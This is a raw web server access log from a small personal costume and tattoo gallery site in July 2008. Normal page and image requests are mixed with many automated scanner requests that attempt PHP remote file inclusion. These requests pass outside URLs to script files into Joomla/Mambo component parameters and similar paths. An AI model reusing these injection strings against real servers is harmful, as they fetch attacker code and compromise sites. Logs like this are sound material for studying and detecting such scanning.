74.69.251.226 - - [28/Jul/2008:23:20:34 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:34 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:34 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.220.163.9 - - [28/Jul/2008:23:20:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boardal.com/lang/arab.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
74.220.163.9 - - [28/Jul/2008:23:20:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boardal.com/lang/arab.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.69.251.226 - - [28/Jul/2008:23:20:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:47 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2155 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:47 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:47 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:47 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:47 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:47 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:48 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:48 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:21:10 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:21:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
72.248.189.82 - - [28/Jul/2008:23:22:23 -0500] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:22:23 -0500] "GET /logs/access_log.1213142400%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:22:23 -0500] "GET /logs/access_log.1213315200%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:22:24 -0500] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:23:55 -0500] "GET /logs/access_log.1212883200//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:24:03 -0500] "GET /logs/access_log.1213142400//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
64.38.22.250 - - [28/Jul/2008:23:24:30 -0500] "GET /logs/htmltonuke.php?filnavn=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
64.38.22.250 - - [28/Jul/2008:23:24:30 -0500] "GET /htmltonuke.php?filnavn=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
62.75.222.111 - - [28/Jul/2008:23:24:37 -0500] "GET /logs/htmltonuke.php?filnavn=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
62.75.222.111 - - [28/Jul/2008:23:24:38 -0500] "GET /htmltonuke.php?filnavn=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:25:21 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:25:23 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:27:01 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:27:02 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
66.249.70.131 - - [28/Jul/2008:23:27:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.248.189.82 - - [28/Jul/2008:23:27:37 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:27:37 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
200.99.76.3 - - [28/Jul/2008:23:28:14 -0500] "GET /logs/access_log.1207785600/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:28:15 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:28:15 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:29:08 -0500] "GET /logs/access_log.1207785600/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:29:08 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:29:09 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:23:31:02 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:31:05 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
80.67.25.19 - - [28/Jul/2008:23:32:27 -0500] "GET /logs/?sourcedir=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.808"
80.67.25.19 - - [28/Jul/2008:23:32:27 -0500] "GET /?sourcedir=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.808"
80.231.0.98 - - [28/Jul/2008:23:33:21 -0500] "GET /logs/?sourcedir=http://www.saltgum.com/mild.net???? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
80.231.0.98 - - [28/Jul/2008:23:33:22 -0500] "GET /?sourcedir=http://www.saltgum.com/mild.net???? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:23:35:33 -0500] "GET /logs/language.php?DOCUMENT_ROOT==http://sujianto.com/load.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:23:35:33 -0500] "GET /language.php?DOCUMENT_ROOT==http://sujianto.com/load.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:35:45 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
72.248.189.82 - - [28/Jul/2008:23:36:22 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:36:22 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
200.99.76.3 - - [28/Jul/2008:23:36:33 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.210.115.114 - - [28/Jul/2008:23:37:09 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:37:10 -0500] "GET //appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:37:11 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:37:20 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:37:20 -0500] "GET //appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:37:20 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
65.167.141.55 - - [28/Jul/2008:23:37:48 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 200 98304 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.108.67.220 - - [28/Jul/2008:23:39:20 -0500] "GET /logs/?sourcedir=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.812"
89.108.67.220 - - [28/Jul/2008:23:39:20 -0500] "GET /?sourcedir=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:42:36 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:42:36 -0500] "GET //appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:42:36 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
209.97.201.148 - - [28/Jul/2008:23:43:29 -0500] "GET /join.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:23:43:29 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
207.210.115.114 - - [28/Jul/2008:23:43:50 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
207.210.115.114 - - [28/Jul/2008:23:43:50 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
201.238.195.13 - - [28/Jul/2008:23:44:28 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
201.238.195.13 - - [28/Jul/2008:23:44:28 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:23:44:29 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:44:29 -0500] "GET //appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
74.6.22.98 - - [28/Jul/2008:23:44:53 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [28/Jul/2008:23:44:54 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.97.201.148 - - [28/Jul/2008:23:45:49 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:23:45:49 -0500] "GET /include/Classes.inc.php?tm_includepath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:23:46:39 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:46:40 -0500] "GET //appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:46:40 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
216.246.77.172 - - [28/Jul/2008:23:47:13 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
216.246.77.172 - - [28/Jul/2008:23:47:13 -0500] "GET //appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
216.246.77.172 - - [28/Jul/2008:23:47:13 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
207.210.115.114 - - [28/Jul/2008:23:49:32 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
62.76.116.20 - - [28/Jul/2008:23:50:30 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:50:30 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
210.245.87.117 - - [28/Jul/2008:23:51:42 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:51:42 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
208.75.148.34 - - [28/Jul/2008:23:52:01 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
208.75.148.34 - - [28/Jul/2008:23:52:01 -0500] "GET //appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
208.75.148.34 - - [28/Jul/2008:23:52:01 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
62.76.116.20 - - [28/Jul/2008:23:52:46 -0500] "GET /logs/access_log.1212883200/config/dbutil.bck.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:52:46 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:52:46 -0500] "GET /config/dbutil.bck.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:12 -0500] "GET /logs/access_log.1212883200/config/dbutil.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:12 -0500] "GET /config/dbutil.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:13 -0500] "GET /logs/config/dbutil.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:15 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:15 -0500] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:28 -0500] "GET /logs/access_log.1214438400/config/dbutil.bck.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:53:55 -0500] "GET /logs/access_log.1214438400/config/dbutil.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:54:55 -0500] "GET /logs/access_log.1214438400%20/config/dbutil.bck.php?confdir=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
216.246.77.172 - - [28/Jul/2008:23:55:01 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:56:01 -0500] "GET /logs/include/Classes.inc.php?tm_includepath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
62.76.116.20 - - [28/Jul/2008:23:56:01 -0500] "GET /include/Classes.inc.php?tm_includepath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.248.189.82 - - [28/Jul/2008:23:56:33 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:56:33 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:58:25 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.69.42.116 - - [28/Jul/2008:23:59:04 -0500] "GET /logs/config/dbutil.php?confdir=http://www.apnic.net/index.html? HTTP/1.0" 404 294 "-""Mozilla/5.0"
200.69.42.116 - - [28/Jul/2008:23:59:05 -0500] "GET /logs/config/dbutil.php?confdir=http://www.apnic.net/index.html? HTTP/1.0" 404 294 "-""Mozilla/5.0"
71.106.190.75 - - [28/Jul/2008:23:59:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [28/Jul/2008:23:59:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [28/Jul/2008:23:59:24 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [28/Jul/2008:23:59:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [28/Jul/2008:23:59:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
208.75.148.34 - - [28/Jul/2008:23:59:42 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:00 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:01 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:01 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:01 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
